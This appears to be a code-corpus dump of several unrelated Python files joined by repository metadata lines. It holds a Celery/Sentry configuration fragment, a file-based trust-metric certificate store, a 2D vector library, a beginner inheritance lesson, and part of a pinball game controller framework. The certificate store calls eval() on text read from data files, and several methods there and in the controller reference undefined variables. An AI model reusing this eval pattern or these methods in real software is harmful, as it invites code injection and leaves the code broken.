CELERY_TASK_SERIALIZER='json',
CELERY_ACCEPT_CONTENT=['json'],
CELERY_RESULT_SERIALIZER='json',
BROKER_URL="sqs://%s:%s@" % (settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY),
CELERY_RESULT_BACKEND="redis",
CELERY_TIMEZONE='Europe/Copenhagen',
BROKER_TRANSPORT_OPTIONS={'region': 'eu-west-1',
'polling_interval': 0.3,
'visibility_timeout': 3600,
'queue_name_prefix': 'catalog_products_'},
)
class ImagesCallbackTask(Task):
"""
Generic subclass for Product Image Processing tasks
    so that in case of failure, a notification is sent to Sentry.
"""
# def on_success(self, retval, task_id, args, kwargs):
# pass
def on_failure(self, exc, task_id, args, kwargs, einfo):
# client.captureMessage('Task "%s" has failed miserably.' % task_id)
client.capture('raven.events.Message', message='Task "%s" has failed miserably.' % task_id,
data={},
extra={'exc': exc,
'Task ID': task_id,
'Args': args,
'Kwargs': kwargs,
'einfo': einfo
}
)
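# Illustrative sketch (not part of the original module): tasks opt in to the
# Sentry failure notification above through the ``base=`` argument of the task
# decorator.  ``process_image`` and its ``image_id`` argument are hypothetical
# examples, not real project code.
@celery.task(base=ImagesCallbackTask)
def process_image(image_id):
    # Delegate to the use-case layer; if this raises, the on_failure hook of
    # ImagesCallbackTask reports the failure to Sentry.
    usecases.add_image(image_id)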
usecases.add_image = celery.task(usecases.add_image) | mit | -463,160,966,042,746,240 | 33.326531 | 100 | 0.558001 | false |
guaka/trust-metrics | trustlet/pymmetry/file_certs.py | 1 | 9725 | #!/usr/bin/env python
""" file_certs.py: File-based Trust Metric Profiles (example code)
Copyright (C) 2001 Luke Kenneth Casson Leighton <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
File-based Profiles on which certifications (also file-based) can
be stored and retrieved for evaluation by Trust Metrics.
...with NO LOCKING! ...yet.
unfortunately, type info of non-string profile names
is lost on the [very basic] file-format. so, whilst
the trust metric and net flow evaluation code couldn't
care less what the type of its nodes is, the file
storage does.
*shrug*. who wants to be a number, anyway.
WARNING: there is a lot of class-context overloading
in this demonstration code, particularly DictCertifications
and FileCertifications get reused rather inappropriately.
... but it will do, as a simple example. [i'll get round
to doing a SQL and an XML one, later, properly].
"""
from certs import DictCertifications, CertInfo
from profile import Profile
from string import join
from os import makedirs, path
# deal with having to store strings as text. *sigh*
def unsafe_str(s):
s = s.strip()
if s[0] != "'" and s[0] != '"':
# paranoia. don't want code from file evaluated!
# if someone edits a file and removes the first
# quote but not the second, TOUGH.
s = '"""'+s+'"""'
return eval(s)
# yes, we _do_ want the quotes.
# they get removed by unsafe_str, above, on retrieval.
def safe_str(s):
return repr(str(s))
class FileCertifications(DictCertifications):
""" Certification file of format:
certname1: user1=level1, user2=level2, ...
certname2: user1=level1, user2=level2, ...
"""
def set_filename(self, file):
self.f = file
try:
p, f = path.split(file)
makedirs(p)
except:
pass
def __read_dict(self):
self.info = {}
try:
f = open(self.f,"rw")
except:
return
for l in f.readlines():
l = l.strip()
if len(l) == 0:
continue
[ftype, certs] = l.split(":")
ftype = unsafe_str(ftype)
certs = certs.split(",")
for cert in certs:
[fname, flevel] = cert.split("=")
l = unsafe_str(flevel)
fn = unsafe_str(fname)
DictCertifications.add(self, ftype, fn, l)
f.close()
def __write_dict(self):
f = open(self.f,"w")
for key in DictCertifications.cert_keys(self):
l = safe_str(key)+": "
certs = []
dict = DictCertifications.certs_by_type(self, key)
for c in dict.keys():
certs.append(safe_str(c)+"="+safe_str(dict[c]))
l += join(certs, ", ") + "\n"
f.write(l)
f.close()
def cert_keys(self):
self.__read_dict()
return DictCertifications.cert_keys(self)
def certs_by_type(self, type):
self.__read_dict()
return DictCertifications.certs_by_type(self, type)
def cert_type_keys(self, type, name):
self.__read_dict()
return DictCertifications.certs_type_keys(self, type, name)
def add(self, type, name, level):
self.__read_dict()
DictCertifications.add(self, type, name, level)
self.__write_dict()
def remove(self, type, name):
self.__read_dict()
DictCertifications.remove(self, type, name, level)
self.__write_dict()
def cert_level(self, type, name):
self.__read_dict()
return DictCertifications.cert_level(self, type, name)
class FileProfile(Profile):
def __init__(self, name, CertClass):
Profile.__init__(self, name, CertClass)
self._certs_by_subj.set_filename("users/"+str(name)+"/certs.subj")
self._certs_by_issuer.set_filename("users/"+str(name)+"/certs.issuer")
# overload meaning of FileCertifications here to store user-profile.
self.info = FileCertifications()
self.info.set_filename("users/"+str(name)+"/profile")
def set_filename(self, file):
self.info.set_filename(file)
def info_keys(self):
return self.info.cert_keys()
def infos_by_type(self, type):
return self.info.certs_by_type(type)
def info_type_keys(self, type, name):
return self.info.certs_type_keys(type, name)
def add(self, type, name, level):
self.info.add(type, name, level)
def remove(self, type, name):
self.info.remove(type, name, level)
def info_index(self, type, name):
return self.info.cert_level(type, name)
class FileCertInfo(CertInfo):
""" This is probably some of the clumsiest code ever written.
overload DictCertification - because it's been a really
good, lazy weekend, to store an unordered list (seeds),
an ordered list (levels) etc.
yuck. please, someone shoot me or do a better job,
_esp._ for example code.
"""
def cert_seeds(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
# clumsy usage of a dictionary as an unordered list. argh.
d = d.certs_by_type("seeds")
return d.keys()
def cert_levels(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
dict = d.certs_by_type("levels")
# clumsy usage of a dictionary into an ordered list. argh.
keys = dict.keys()
l = [None] * len(keys)
for idx in keys:
l[int(idx)] = dict[idx]
return l
def cert_level_default(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
[d] = d.certs_by_type("default level").keys()
return d
def cert_level_min(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
[d] = d.certs_by_type("min level").keys()
return d
def cert_tmetric_type(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
[d] = d.certs_by_type("type").keys()
return d
def add_cert_seed(self, idxn, seed):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
# clumsy usage of a dictionary as an unordered list. argh.
return d.add("seeds", seed, None)
def add_cert_level(self, idxn, level, index):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
# clumsy usage of a dictionary as an index-ordered list. argh.
return d.add("levels", index, level)
def set_cert_level_default(self, idxn, dflt_level):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
return d.add("default level", dflt_level, None)
def set_cert_level_min(self, idxn, min_level):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
return d.add("min level", min_level, None)
def set_cert_tmetric_type(self, idxn, type):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
return d.add("type", type, None)
def test():
from profile import Profiles
from tm_calc import PymTrustMetric
from pprint import pprint
f = FileCertInfo()
f.add_cert_seed('like', '55')
f.add_cert_seed('like', 'luke')
f.add_cert_level('like', 'none', 0)
f.add_cert_level('like', "don't care", 1)
f.add_cert_level('like', 'good', 2)
f.add_cert_level('like', 'best', 3)
f.set_cert_level_default('like', "don't care")
f.set_cert_level_min('like', 'none')
f.set_cert_tmetric_type('like', 'to')
f.add_cert_seed('hate', 'heather')
f.add_cert_seed('hate', '10')
f.add_cert_level('hate', 'none', 0)
f.add_cert_level('hate', "don't care", 1)
f.add_cert_level('hate', 'dislike', 2)
f.add_cert_level('hate', 'looks CAN kill', 3)
f.set_cert_level_default('hate', "don't care")
f.set_cert_level_min('hate', 'none')
f.set_cert_tmetric_type('hate', 'to')
p = Profiles(FileProfile, FileCertifications)
r = p.add_profile('luke')
r.add("name", 0, "luke")
r.add("name", 1, "kenneth")
r.add("name", 2, "casson")
r.add("name", 3, "leighton")
r.add("info", 0, "likes python a lot - thinks it's really cool")
r.add("info", 1, "groks network traffic like he has a built-in headsocket")
p.add_profile('heather')
p.add_profile('bob')
p.add_profile('mary')
p.add_profile('lesser fleas')
p.add_profile('little fleas')
p.add_profile('fleas')
p.add_profile('robbie the old crock pony')
p.add_profile('tart the flat-faced persian cat')
p.add_profile('mo the mad orange pony')
p.add_profile('55')
p.add_profile('10')
p.add_profile('2')
p.add_profile('fleas ad infinitum')
p.add_cert('luke', 'like', 'heather', 'best')
p.add_cert('heather', 'like', 'luke', 'best')
p.add_cert('heather', 'like', 'robbie the old crock pony', 'best')
p.add_cert('heather', 'like', 'tart the flat-faced persian cat', 'best')
p.add_cert('heather', 'like', 'mo the mad orange pony', 'best' )
p.add_cert('bob', 'like', 'mary', 'good')
p.add_cert('bob', 'like', 'heather', 'good')
p.add_cert('mary', 'like', 'bob', 'good')
p.add_cert('fleas', 'like', 'little fleas', 'good')
p.add_cert('little fleas', 'like', 'lesser fleas', 'best')
p.add_cert('lesser fleas', 'like', 'fleas ad infinitum', 'best')
p.add_cert('robbie the old crock pony', 'like', 'fleas', 'best')
p.add_cert('55', 'like', '10', 'none')
p.add_cert('10', 'like', '2', 'best')
p.add_cert('heather', 'hate', 'bob', 'dislike' )
p.add_cert('heather', 'hate', 'fleas', 'looks CAN kill' )
p.add_cert('fleas', 'hate', 'mary', 'dislike')
p.add_cert('10', 'hate', '55', 'looks CAN kill')
t = PymTrustMetric(f, p)
r = t.tmetric_calc('like')
pprint(r)
r = t.tmetric_calc('like', ['heather'])
pprint(r)
r = t.tmetric_calc('hate')
pprint(r)
if __name__ == '__main__':
test()
| gpl-2.0 | -2,231,080,821,749,822,500 | 27.943452 | 77 | 0.668072 | false |
natduca/ndbg | util/vec2.py | 1 | 3522 | # Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
class vec2(object):
def __init__(self, opt_a=None,opt_b=None):
if opt_a != None and opt_b != None:
self.x = float(opt_a)
self.y = float(opt_b)
elif opt_a != None:
self.x = float(opt_a.x)
self.y = float(opt_a.y)
else:
self.x = 0
self.y = 0
def set(self,a,opt_b=None):
if opt_b != None:
self.x = float(a)
self.y = float(opt_b)
else:
self.x = float(a.x)
self.y = float(a.y)
def __str__(self):
return "(%f,%f)" % (self.x,self.y)
def vec2_add(a,b):
dst = vec2()
dst.x = a.x + b.x
dst.y = a.y + b.y
return dst
def vec2_accum(a,b):
a.x += b.x
a.y += b.y
return a
def vec2_sub(a,b):
dst = vec2()
dst.x = a.x - b.x
dst.y = a.y - b.y
return dst
def vec2_neg_accum(a,b):
a.x -= b.x
a.y -= b.y
return a
def vec2_scale(a,scale):
dst = vec2()
dst.x = a.x * scale
dst.y = a.y * scale
return dst
def vec2_scale_inplace(a,scale):
a.x *= scale
a.y *= scale
return a
def vec2_piecewise_mul(a,b):
dst = vec2()
dst.x = a.x * b.x
dst.y = a.y * b.y
return dst
def vec2_piecewise_div(a,b):
dst = vec2()
dst.x = a.x / b.x
dst.y = a.y / b.y
return dst
def vec2_dot(a,b):
return a.x * b.x + a.y * b.y
def vec2_length(a):
return math.sqrt(vec2_dot(a,a))
def vec2_length_sqared(a):
return vec2_dot(a,a)
def vec2_normalize(a):
s = 1/vec2_length(a)
return vec2_scale(a,s)
def vec2_normalize_inplace(dst):
s = 1/vec2_length(dst)
dst.x *= s
dst.y *= s
return dst
def vec2_interp(a,b,factor):
delta = vec2_sub(b,a)
vec2_scale_inplace(delta,factor)
vec2_accum(delta,a)
return delta
def vec2_distance(a,b):
return vec2_length(vec2_sub(b,a))
class rect(object):
def __init__(self,opt_a=None,opt_b=None,centered=False):
if opt_a and opt_b:
self.pos = vec2(opt_a)
self.size = vec2(opt_b)
elif opt_a == None and opt_b == None:
self.pos = vec2(0,0)
self.size = vec2(0,0)
else:
raise Exception("Need two args or none")
if centered:
hsize = vec2_scale(self.size,0.5)
self.pos = vec2_sub(self.pos,hsize)
def contains(self,v):
return v.x >= self.pos.x and v.x < self.pos.x + self.size.x and v.y >= self.pos.y and v.y < self.pos.y + self.size.y
###########################################################################
class ivec2(object):
def __init__(self, opt_a=None,opt_b=None):
if opt_a != None and opt_b != None:
self.x = int(opt_a)
self.y = int(opt_b)
elif opt_a != None:
self.x = int(opt_a.x)
self.y = int(opt_a.y)
else:
self.x = 0
self.y = 0
def set(self,a,opt_b=None):
if opt_b != None:
self.x = int(a)
self.y = int(opt_b)
else:
self.x = int(a.x)
self.y = int(a.y)
def __str__(self):
return "(%i,%i)" % (self.x,self.y)
| apache-2.0 | 5,074,446,273,003,439,000 | 20.47561 | 121 | 0.561045 | false |
KT26/PythonCourse | 8. Class/8.py | 1 | 1268 | # Created by PyCharm Pro Edition
# User: Kaushik Talukdar
# Date: 24-04-17
# Time: 12:29 AM
# INHERITANCE
# We can create a new class, but instead of writing it from scratch, we can base it on an existing class.
# Let's understand inheritance better with an example
class Car():
def __init__(self, make, model, year):
self.make = make
self.model = model
self.year = year
self.mileage = 0
def get_descriptive_name(self):
full_name = self.make.title() + ' ' + self.model.title() + ' ' + str(self.year)
return full_name
def update_odometer(self, mileage):
self.mileage = mileage
# The class below is a child class derived from Car and has access to Car's variables as well as its methods.
# The parent class name must appear in parentheses in the child class definition for inheritance to work.
# The super() method is responsible for providing the child class with all the variables and methods of the parent class.
class ElectricCar(Car):
def __init__(self, make, model, year):
super().__init__(make, model, year)
my_car = ElectricCar('Tesla', 'Model S', '2017')
car = my_car.get_descriptive_name()
print(car)
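# A possible next step (illustrative, not part of the original lesson): a child
# class can also add its own attributes and override parent methods.
class ElectricCarWithBattery(Car):
    def __init__(self, make, model, year):
        super().__init__(make, model, year)
        self.battery_size = 70   # new attribute specific to this child class
    def get_descriptive_name(self):
        # override the parent method but reuse its result
        return super().get_descriptive_name() + ' (' + str(self.battery_size) + ' kWh battery)'
print(ElectricCarWithBattery('Tesla', 'Model S', '2017').get_descriptive_name())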
| mit | -6,550,018,117,725,046,000 | 31.368421 | 116 | 0.630126 | false |
mjocean/PyProcGameHD-SkeletonGame | procgame/game/game.py | 1 | 34216 | import os
import sys
import pinproc
import Queue
import yaml
import time
import copy
import logging
from procgame import config
from gameitems import *
from procgame import util
from mode import *
from pdb import PDBConfig, LED
from procgame import LEDs
def config_named(name):
if not os.path.isfile(name): # If we cannot find this file easily, try searching the config_path:
config_paths = config.value_for_key_path('config_path', ['.'])
if issubclass(type(config_paths), str):
config_paths = [config_paths]
found_path = util.find_file_in_path(name, config_paths)
if found_path:
name = found_path
else:
return None
return yaml.load(open(name, 'r'))
class GameController(object):
"""Core object representing the game itself.
Usually a game developer will create a new game by subclassing this class.
Consider subclassing :class:`BasicGame` instead, as it makes use of several helpful modes
and controllers.
"""
machine_type = None
"""Machine type used to configure :attr:`proc` in this class's initializer."""
proc = None
"""A :class:`pinproc.PinPROC` instance, created in the initializer with machine type :attr:`machine_type`."""
modes = None
"""An instance of :class:`ModeQueue`, which manages the presently active modes."""
coils = AttrCollection("drivers")
"""An :class:`AttrCollection` of :class:`Driver` objects. Populated by :meth:`load_config`."""
lamps = AttrCollection("lamps")
"""An :class:`AttrCollection` of :class:`Driver` objects. Populated by :meth:`load_config`."""
switches = AttrCollection("switches")
"""An :class:`AttrCollection` of :class:`Switch` objects. Populated by :meth:`load_config`."""
leds = AttrCollection("leds")
"""An :class:`AttrCollection` of :class:`LED` objects. Populated by :meth:`load_config`."""
ball = 0
"""The number of the current ball. A value of 1 represents the first ball; 0 indicates game over."""
players = []
"""Collection of :class:`Player` objects."""
old_players = []
"""Copy of :attr:`players` made when :meth:`reset` is called."""
current_player_index = 0
"""Index in :attr:`players` of the current player."""
t0 = None
"""Start :class:`time.time` of the game program. I.e., the time of power-up."""
config = None
"""YAML game configuration loaded by :meth:`load_config`."""
balls_per_game = 3
"""Number of balls per game."""
game_data = {}
"""Contains high score and audit information. That is, transient information specific to one game installation."""
user_settings = {}
"""Contains local game configuration, such as the volume."""
logger = None
""":class:`Logger` object instance; instantiated in :meth:`__init__` with the logger name "game"."""
# MJO: Virtual DMD w/o h/w DMD
frames_per_second = 30
"""Setting this to true in the config.yaml enables a virtual DMD without physical DMD events going to the PROC"""
LEDs = None
def __init__(self, machine_type):
super(GameController, self).__init__()
self.logger = logging.getLogger('game')
self.machine_type = pinproc.normalize_machine_type(machine_type)
self.proc = self.create_pinproc()
self.proc.reset(1)
self.modes = ModeQueue(self)
self.t0 = time.time()
self.LEDs = LEDs.LEDcontroller(self)
self.dmd_updates = 0
def create_pinproc(self):
"""Instantiates and returns the class to use as the P-ROC device.
This method is called by :class:`GameController`'s init method to populate :attr:`proc`.
Checks :mod:`~procgame.config` for the key path ``pinproc_class``.
If that key path exists the string is used as the fully qualified class name
to instantiate. The class is then instantiated with one initializer argument,
:attr:`machine_type`.
If that key path does not exist then this method returns an instance of :class:`pinproc.PinPROC`.
"""
self.frames_per_second = config.value_for_key_path('dmd_framerate', 30)
klass_name = config.value_for_key_path('pinproc_class', 'pinproc.PinPROC')
klass = util.get_class(klass_name)
return klass(self.machine_type)
def create_player(self, name):
"""Instantiates and returns a new instance of the :class:`Player` class with the
name *name*.
This method is called by :meth:`add_player`.
This can be used to supply a custom subclass of :class:`Player`.
"""
return Player(name)
def __enter__(self):
pass
def __exit__(self):
del self.proc
def reset(self):
"""Reset the game state as a slam tilt might."""
self.ball = 0
self.old_players = []
self.old_players = self.players[:]
self.players = []
self.current_player_index = 0
self.modes.modes = []
def current_player(self):
"""Returns the current :class:`Player` as described by :attr:`current_player_index`."""
if len(self.players) > self.current_player_index:
return self.players[self.current_player_index]
else:
return None
def add_player(self):
"""Adds a new player to :attr:`players` and assigns it an appropriate name."""
player = self.create_player('Player %d' % (len(self.players) + 1))
self.players += [player]
return player
def get_ball_time(self):
return self.ball_end_time - self.ball_start_time
def get_game_time(self, player):
return self.players[player].game_time
def save_ball_start_time(self):
self.ball_start_time = time.time()
def start_ball(self):
"""Called by the implementor to notify the game that (usually the first) ball should be started."""
self.ball_starting()
def ball_starting(self):
"""Called by the game framework when a new ball is starting."""
self.save_ball_start_time()
def shoot_again(self):
"""Called by the game framework when a new ball is starting which was the result of a stored extra ball (Player.extra_balls).
The default implementation calls ball_starting(), which is not called by the framework in this case."""
self.ball_starting()
def ball_ended(self):
"""Called by the game framework when the current ball has ended."""
pass
def end_ball(self):
"""Called by the implementor to notify the game that the current ball has ended."""
self.ball_end_time = time.time()
# Calculate ball time and save it because the start time
# gets overwritten when the next ball starts.
self.ball_time = self.get_ball_time()
self.current_player().game_time += self.ball_time
self.ball_ended()
if self.current_player().extra_balls > 0:
self.current_player().extra_balls -= 1
self.shoot_again()
return
if self.current_player_index + 1 == len(self.players):
self.ball += 1
self.current_player_index = 0
else:
self.current_player_index += 1
if self.ball > self.balls_per_game:
self.end_game()
else:
self.start_ball() # Consider: Do we want to call this here, or should it be called by the game? (for bonus sequence)
def game_started(self):
"""Called by the GameController when a new game is starting."""
self.ball = 1
self.players = []
self.current_player_index = 0
def start_game(self):
"""Called by the implementor to notify the game that the game has started."""
self.game_started()
def game_ended(self):
"""Called by the GameController when the current game has ended."""
pass
def end_game(self):
"""Called by the implementor to mark notify the game that the game has ended."""
self.ball = 0
self.game_ended()
def is_game_over(self):
"""Returns `True` if the game is in game over. A game is in game over if :attr:`ball` is 0."""
return self.ball == 0
def dmd_event(self):
"""Called by the GameController when a DMD event has been received."""
pass
def tick(self):
"""Called by the GameController once per run loop."""
pass
def load_config(self, filename):
"""Reads the YAML machine configuration file into memory.
Configures the switches, lamps, and coils members.
Enables notifyHost for the open and closed debounced states on each configured switch.
"""
self.logger.info('Loading machine configuration from "%s"...', filename)
self.config = config_named(filename)
if not self.config:
raise ValueError, 'load_config(filename="%s") could not be found. Did you set config_path?' % (filename)
self.process_config()
def load_config_stream(self, stream):
"""Reads the YAML machine configuration in stream form (string or opened file) into memory.
Configures the switches, lamps, and coils members.
Enables notifyHost for the open and closed debounced states on each configured switch.
"""
self.config = yaml.load(stream)
if not self.config:
raise ValueError, 'load_config_stream() could not load configuration. Malformed YAML?'
self.process_config()
def process_config(self):
"""Called by :meth:`load_config` and :meth:`load_config_stream` to process the values in :attr:`config`."""
pairs = [('PRCoils', self.coils, Driver),
('PRLamps', self.lamps, Driver),
('PRSwitches', self.switches, Switch),
('PRLEDs', self.leds, LED) ]
new_virtual_drivers = []
polarity = self.machine_type == pinproc.MachineTypeSternWhitestar or self.machine_type == pinproc.MachineTypeSternSAM or self.machine_type == pinproc.MachineTypePDB
# Because PDBs can be configured in many different ways, we need to traverse
# the YAML settings to see how many PDBs are being used. Then we can configure
# the P-ROC appropriately to use those PDBs. Only then can we relate the YAML
# coil/lamp #'s to P-ROC numbers for the collections.
if self.machine_type == pinproc.MachineTypePDB:
pdb_config = PDBConfig(self.proc, self.config)
for section, collection, klass in pairs:
if section in self.config:
sect_dict = self.config[section]
for name in sect_dict:
item_dict = sect_dict[name]
# Find the P-ROC number for each item in the YAML sections. For PDB's
# the number is based on the PDB configuration determined above. For
# other machine types, pinproc's decode() method can provide the number.
if self.machine_type == pinproc.MachineTypePDB:
number = pdb_config.get_proc_number(section, str(item_dict['number']))
if number == -1:
self.logger.error('%s Item: %s cannot be controlled by the P-ROC. Ignoring...', section, name)
continue
else:
number = pinproc.decode(self.machine_type, str(item_dict['number']))
item = None
if ('bus' in item_dict and item_dict['bus'] == 'AuxPort') or number >= pinproc.DriverCount:
item = VirtualDriver(self, name, number, polarity)
new_virtual_drivers += [number]
else:
yaml_number = str(item_dict['number'])
if klass==LED:
number = yaml_number
item = klass(self, name, number)
item.yaml_number = yaml_number
if 'label' in item_dict:
item.label = item_dict['label']
if 'type' in item_dict:
item.type = item_dict['type']
if 'tags' in item_dict:
tags = item_dict['tags']
if type(tags) == str:
item.tags = tags.split(',')
elif type(tags) == list:
item.tags = tags
else:
self.logger.warning('Configuration item named "%s" has unexpected tags type %s. Should be list or comma-delimited string.' % (name, type(tags)))
if klass==Switch:
if (('debounce' in item_dict and item_dict['debounce'] == False) or number >= pinproc.SwitchNeverDebounceFirst):
item.debounce = False
if klass==Driver:
if ('pulseTime' in item_dict):
item.default_pulse_time = item_dict['pulseTime']
if ('polarity' in item_dict):
item.reconfigure(item_dict['polarity'])
if klass==LED:
if ('polarity' in item_dict):
item.invert = not item_dict['polarity']
collection.add(name, item)
# In the P-ROC, VirtualDrivers will conflict with regular drivers on the same group.
# So if any VirtualDrivers were added, the regular drivers in that group must be changed
# to VirtualDrivers as well.
for virtual_driver in new_virtual_drivers:
base_group_number = virtual_driver/8
for collection in [self.coils, self.lamps]:
items_to_remove = []
for item in collection:
if item.number/8 == base_group_number:
                        items_to_remove += [{'name': item.name, 'number': item.number}]
for item in items_to_remove:
self.logger.info( "Removing %s from %s" , item[name],str(collection))
collection.remove(item[name], item[number])
self.logger.info("Adding %s to VirtualDrivers",item[name])
collection.add(item[name], VirtualDriver(self, item[name], item[number], polarity))
if 'PRBallSave' in self.config:
sect_dict = self.config['PRBallSave']
self.ballsearch_coils = sect_dict['pulseCoils']
self.ballsearch_stopSwitches = sect_dict['stopSwitches']
self.ballsearch_resetSwitches = sect_dict['resetSwitches']
# We want to receive events for all of the defined switches:
self.logger.info("Programming switch rules...")
for switch in self.switches:
if switch.debounce:
self.proc.switch_update_rule(switch.number, 'closed_debounced', {'notifyHost':True, 'reloadActive':False}, [], False)
self.proc.switch_update_rule(switch.number, 'open_debounced', {'notifyHost':True, 'reloadActive':False}, [], False)
else:
self.proc.switch_update_rule(switch.number, 'closed_nondebounced', {'notifyHost':True, 'reloadActive':False}, [], False)
self.proc.switch_update_rule(switch.number, 'open_nondebounced', {'notifyHost':True, 'reloadActive':False}, [], False)
# Configure the initial switch states:
states = self.proc.switch_get_states()
for sw in self.switches:
sw.set_state(states[sw.number] == 1)
sect_dict = self.config['PRGame']
self.num_balls_total = sect_dict['numBalls']
self.logger.info("LEDS...")
for led in self.leds:
self.logger.info(" LED name=%s; number=%s" % (led.name,led.yaml_number))
def load_settings(self, template_filename, user_filename):
"""Loads the YAML game settings configuration file. The game settings
describe operator configuration options, such as balls per game and
replay levels.
The *template_filename* provides default values for the game;
*user_filename* contains the values set by the user.
See also: :meth:`save_settings`
"""
settings_changed = False
self.user_settings = {}
self.settings = yaml.load(open(template_filename, 'r'))
if os.path.exists(user_filename):
self.user_settings = yaml.load(open(user_filename, 'r'))
# this pass ensures the user settings include everything in the
# game settings by assigning defaults for anything missing
for section in self.settings:
for item in self.settings[section]:
if not section in self.user_settings:
self.user_settings[section] = {}
settings_changed = True
if not item in self.user_settings[section]:
settings_changed = True
self.logger.error("Missing setting in user settings file; will be replaced with default:\n%s:{%s}\n-------" % (section,item))
if 'default' in self.settings[section][item]:
self.user_settings[section][item] = self.settings[section][item]['default']
else:
self.user_settings[section][item] = self.settings[section][item]['options'][0]
else:
if 'increments' not in self.settings[section][item]:
if(self.user_settings[section][item] not in self.settings[section][item]['options']):
settings_changed = True
self.logger.error("Invalid value found in user settings file; will be replaced with default:\n%s:{%s}\n-------" % (section,item))
if 'default' in self.settings[section][item]:
self.user_settings[section][item] = self.settings[section][item]['default']
else:
self.user_settings[section][item] = self.settings[section][item]['options'][0]
# this pass logs settings that occur in the user settings
# but not in game settings and removes them
invalid_sections = []
for section in self.user_settings:
if(section not in self.settings):
settings_changed = True
self.logger.error("Deprecated section found in user settings file; will be removed:\n%s\n-------" % section)
invalid_sections.append(section)
else:
invalid_items = []
for item in self.user_settings[section]:
if item not in self.settings[section]:
settings_changed = True
self.logger.error("Deprecated setting found in user settings file; will be removed:\n%s:{%s}\n-------" % (section, item))
invalid_items.append(item)
for item in invalid_items:
self.user_settings[section].pop(item)
for section in invalid_sections:
self.user_settings.pop(section)
return settings_changed
def save_settings(self, filename):
"""Writes the game settings to *filename*. See :meth:`load_settings`."""
if os.path.exists(filename):
if os.path.exists(filename+'.bak'):
os.remove(filename+'.bak')
os.rename(filename, filename+'.bak')
if os.path.exists(filename):
os.remove(filename)
stream = open(filename, 'w')
yaml.dump(self.user_settings, stream)
file.close(stream)
if os.path.getsize(filename) == 0:
self.logger.error( " ****** CORRUPT GAME USER SETTINGS FILE REPLACING WITH CLEAN DATA --- restoring last copy ****************")
#remove bad file
os.remove(filename)
os.rename(filename+'.bak', filename)
else:
self.logger.info("Settings saved to " + str(filename))
def load_game_data(self, template_filename, user_filename):
"""Loads the YAML game data configuration file. This file contains
transient information such as audits, high scores and other statistics.
The *template_filename* provides default values for the game;
*user_filename* contains the values set by the user.
See also: :meth:`save_game_data`
"""
self.game_data = {}
template_file = open(template_filename,'r')
template = yaml.load(template_file)
file.close(template_file)
if os.path.exists(user_filename):
if os.path.getsize(user_filename) == 0:
self.logger.error( " **************** CORRUPT DATA FILE REPLACING WITH CLEAN DATA --- ****************")
os.remove(user_filename)
os.rename(user_filename+'.bak', user_filename)
user_filename_file = open(user_filename, 'r')
self.game_data = yaml.load(user_filename_file)
file.close(user_filename_file)
if template:
for key, value in template.iteritems():
if key not in self.game_data:
self.game_data[key] = copy.deepcopy(value)
def save_game_data(self, filename):
"""Writes the game data to *filename*. See :meth:`load_game_data`."""
if os.path.exists(filename):
if os.path.exists(filename+'.bak'):
os.remove(filename+'.bak')
os.rename(filename, filename+'.bak')
stream = open(filename, 'w')
yaml.dump(self.game_data, stream)
file.close(stream)
#now check for successful write, if not restore backup file
if os.path.getsize(filename) == 0:
self.logger.info( " **************** CORRUPT DATA FILE REPLACING WITH CLEAN DATA --- restoring last copy ****************")
#remove bad file
os.remove(filename)
os.rename(filename+'.bak', filename)
def enable_flippers(self, enable):
#return True
"""Enables or disables the flippers AND bumpers."""
for flipper in self.config['PRFlippers']:
self.logger.info("Programming flipper %s", flipper)
main_coil = self.coils[flipper+'Main']
if self.coils.has_key(flipper+'Hold'):
style = 'wpc'
self.logger.info("%sabling WPC style flipper" % ("En" if enable else "Dis"))
hold_coil = self.coils[flipper+'Hold']
else:
self.logger.info("%sabling Stern style flipper" % ("En" if enable else "Dis"))
style = 'stern'
switch_num = self.switches[flipper].number
drivers = []
if enable:
if style == 'wpc':
drivers += [pinproc.driver_state_pulse(main_coil.state(), main_coil.default_pulse_time)]
drivers += [pinproc.driver_state_pulse(hold_coil.state(), 0)]
else:
drivers += [pinproc.driver_state_patter(main_coil.state(), 2, 18, main_coil.default_pulse_time, True)]
self.proc.switch_update_rule(switch_num, 'closed_nondebounced', {'notifyHost':False, 'reloadActive':False}, drivers, len(drivers) > 0)
drivers = []
if enable:
drivers += [pinproc.driver_state_disable(main_coil.state())]
if style == 'wpc':
drivers += [pinproc.driver_state_disable(hold_coil.state())]
self.proc.switch_update_rule(switch_num, 'open_nondebounced', {'notifyHost':False, 'reloadActive':False}, drivers, len(drivers) > 0)
if not enable:
main_coil.disable()
if style == 'wpc':
hold_coil.disable()
# Enable the flipper relay on wpcAlphanumeric machines
if self.machine_type == pinproc.MachineTypeWPCAlphanumeric:
self.enable_alphanumeric_flippers(enable)
self.enable_bumpers(enable)
def enable_alphanumeric_flippers(self, enable):
# 79 corresponds to the circuit on the power/driver board. It will be 79 for all WPCAlphanumeric machines.
self.log("AN Flipper enable in game.py called")
flipperRelayPRNumber = 79
if enable:
self.coils[79].pulse(0)
else:
self.coils[79].disable()
def enable_bumpers(self, enable):
for bumper in self.config['PRBumpers']:
